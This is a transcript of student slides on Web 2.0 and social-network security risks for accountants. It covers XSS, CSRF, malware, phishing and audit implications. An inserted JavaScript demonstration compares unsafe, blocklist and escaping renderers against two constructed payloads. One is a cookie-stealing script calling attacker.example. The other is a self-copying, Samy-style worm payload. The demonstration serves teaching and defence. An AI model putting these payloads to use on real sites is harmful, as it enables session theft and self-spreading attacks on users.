
Post on 25-May-2015


TRANSCRIPT

WEB 2.0/SOCIAL NETWORKS AND SECURITY

By: Sherry Gu

For: ACC626

AGENDA

- Definition of Web 2.0
- Magnitude of use of Web 2.0/social networking applications
- Impacts of Web 2.0/social networks on security and security risks
- Types of security attacks
- Triggers/motivations behind security attacks
- Remedies/solutions to security vulnerabilities
- Implications for accountants

WHAT IS WEB 2.0?

- Web 2.0 Conference: “Network as Platform”
- Web 2.0: “managing, understanding, responding…” “…to massive amount of user generated data…” “…in real time”

MAGNITUDE OF USE

For businesses, a 2008 survey found:

- 18% of companies use blogs
- 32% of companies use wikis
- 23% of companies use RSS feeds

Forrester Research: spending on Web 2.0 applications forecast to reach $4.6 billion in 2013

IMPACTS ON SECURITY RISKS

Control/detection risk:

- Web 2.0 adds complexity to the existing system (multiple platforms, multiple sources), which makes controls harder to design and incidents harder to detect

Inherent risk:

- Interactive nature: users post and share content directly
- Increased likelihood of leaking confidential data

Statistics:

- 40% of users have been attacked by malware and phishing from social networking sites
- Ranked the “most serious risk to information security” by SMBs in 2010
- 60% of companies believed that employee behaviour on social networks could endanger network security

XSS ATTACK

- Injecting malicious script into otherwise trusted websites
- The injected script runs in the victim's browser with the trusted site's privileges, so the attacker can read what the browser holds for that site (session cookies, page content) and act as the user
- E.g. the “Samy” worm on MySpace (2005):
  - Added Samy as a friend of anyone who viewed an infected profile
  - Appended “Samy is my hero” to the viewer's profile page, together with a copy of the worm itself
  - Over one million friend requests within a day
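The pattern behind the MySpace worm, as an added example that is not code from the original slides or from the worm itself: a profile renderer in three versions, a naive tag blocklist of the kind sites relied on at the time (constructed here, not MySpace's actual filter), and two constructed payloads, one that steals the session cookie and one that friends the attacker and copies itself into the viewer's profile. Function names and the `/addFriend` and `/profile` routes are assumptions for this illustration.

```javascript
// Added example, not code from the original slides or from the Samy worm itself:
// a stored-XSS profile renderer in three versions. Function names, the blocklist
// filter and the two payloads are constructed for this illustration.

// Vulnerable: profile text is dropped straight into the page markup.
function renderProfileUnsafe(displayName, aboutMe) {
  return `<h1>${displayName}</h1><div class="about">${aboutMe}</div>`;
}

// Still vulnerable: a blocklist that removes the literal <script> tag. Any other
// tag carrying an event handler (onerror, onload, ...) passes straight through.
function stripScriptTags(html) {
  return html.replace(/<\/?script\b[^>]*>/gi, "");
}
function renderProfileBlocklist(displayName, aboutMe) {
  return renderProfileUnsafe(displayName, stripScriptTags(aboutMe));
}

// Hardened: HTML-encode the characters that change meaning in text and attribute
// context, so whatever the user typed can only ever render as text.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}
function renderProfileSafe(displayName, aboutMe) {
  return `<h1>${escapeHtml(displayName)}</h1><div class="about">${escapeHtml(aboutMe)}</div>`;
}

// Rough check of what would reach the browser as executable content: a <script>
// tag, or an on* event-handler attribute inside any tag.
function containsActiveContent(html) {
  return /<script\b/i.test(html) || /<[a-z][^>]*\son\w+\s*=/i.test(html);
}

// Constructed payloads. The first steals the session cookie; the second mimics the
// worm's pattern: friend the attacker, then copy the payload into the viewer's own
// profile so that everyone who views it is infected in turn.
const payloads = [
  `<script>document.location='https://attacker.example/?c='+document.cookie</script>`,
  `<img src="x" onerror="fetch('/addFriend?id=samy');` +
    `fetch('/profile',{method:'POST',body:'about='+encodeURIComponent(document.querySelector('.about').innerHTML)})">`,
];

// Returns, per renderer, whether each payload survives as active content.
function evaluateRenderers() {
  const renderers = {
    unsafe: renderProfileUnsafe,
    blocklist: renderProfileBlocklist,
    safe: renderProfileSafe,
  };
  const results = {};
  for (const [name, render] of Object.entries(renderers)) {
    results[name] = payloads.map((p) => containsActiveContent(render("Samy", p)));
  }
  return results;
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(evaluateRenderers());
  // unsafe: [true, true]  blocklist: [false, true]  safe: [false, false]
}
```

The blocklist stops only the payload that uses the one tag it knows about; the event-handler payload, which is closer to how real worms evade filters, goes through untouched. Contextual output encoding stops both, because the user's text can never become markup.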

CSRF ATTACK

- Lure users into opening/loading a malicious link or page
- The victim's browser sends the forged request together with its cookies, so the request arrives already authenticated to applications the user is logged in to
- The attacker makes undesirable modifications/changes/extractions through those applications without ever seeing the user's credentials
- E.g. Gmail: a forged request created an email filter that forwarded the victim's emails to an attacker-controlled account

MALWARE/SPYWARE/ADWARE

- Malware: worms, viruses, trojans
- Examples:
  - Koobface family malware, spread through Facebook and fake YouTube video pages
  - Bebloh banking trojan: a “man-in-the-browser” attack that tampers with transactions inside the victim's own browser session

SPEAR PHISHING

- Targets specific organizations
- Seeks unauthorized access to confidential data
- The message appears to come from a sender with a direct relationship to the victim
- Social networks help attackers build a more complete profile of the victim and of the people the victim trusts, which makes the impersonated sender convincing

IDENTITY THEFT

Researchers from Eurecom Profile cloning Cross-site cloning

Authentication problems

TRIGGERS/MOTIVATIONS

Technical nature:

- Heavy reliance on client-side source code (e.g. AJAX) and open-source components
- Complex scripts and dynamic content make it difficult for protection software to identify malware signatures

TRIGGERS/MOTIVATIONS

Financial gain:

- Hack into bank accounts
- Sell stolen data to buyers in the large underground market

Organized crime/bot recruitment:

- Web 2.0 applications are public, open, scalable and anonymous, which suits large-scale recruitment of victims into botnets

REMEDIES/SOLUTIONS

- Employee use policies and education (balance between flexibility and security)
- Strengthen monitoring and reviewing activities: extensive logs and audit trails
- Encryption of user data using public and private keys

IMPLICATIONS FOR ACCOUNTANTS

Auditors: assess the need for a risk assessment

- Social network/Web 2.0 strategy, policies, and regulatory compliance requirements
- Risk assessment:
  - Identify types of risk
  - Analyze threat potential
  - Validate risk ratings
  - Hire IT specialists where needed
- ISACA: social media assurance/audit program

CONCLUSION

- Heightened security risks
- Risk assessment is critical
- Policies and procedures
